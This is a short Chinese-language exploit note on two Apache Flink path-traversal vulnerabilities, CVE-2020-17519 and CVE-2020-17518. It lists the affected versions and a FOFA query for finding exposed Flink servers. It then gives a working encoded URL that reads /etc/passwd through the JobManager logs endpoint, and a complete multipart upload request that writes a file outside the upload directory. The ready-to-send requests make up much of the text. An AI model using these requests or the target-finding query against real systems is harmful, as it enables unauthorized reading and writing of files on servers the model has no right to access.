CVE-2020-17519 jobmanager/logs路徑遍歷
介紹
Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也發布)允許攻擊者通過JobManager進程的REST接口讀取JobManager本地文件系統上的任何文件。
影響版本
1.11.0
1.11.1
1.11.2
FOFA
app=”APACHE-Flink”
漏洞驗證
POC:
http://example/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
1 |
|
CVE-2020-17518 上傳路徑遍歷
介紹
Apache Flink 1.5.1引入了REST處理程序,該處理程序允許您通過經過惡意修改的HTTP HEADER將上傳的文件寫入本地文件系統上的任意位置。
影響版本
1.5.1-1.11.2
FOFA
app=”APACHE-Flink”
漏洞驗證
POC:
POST /jars/upload HTTP/1.1 Host: localhost:8081 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success" success ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
通過上面的路徑遍歷可知文件寫入成功:
參考鏈接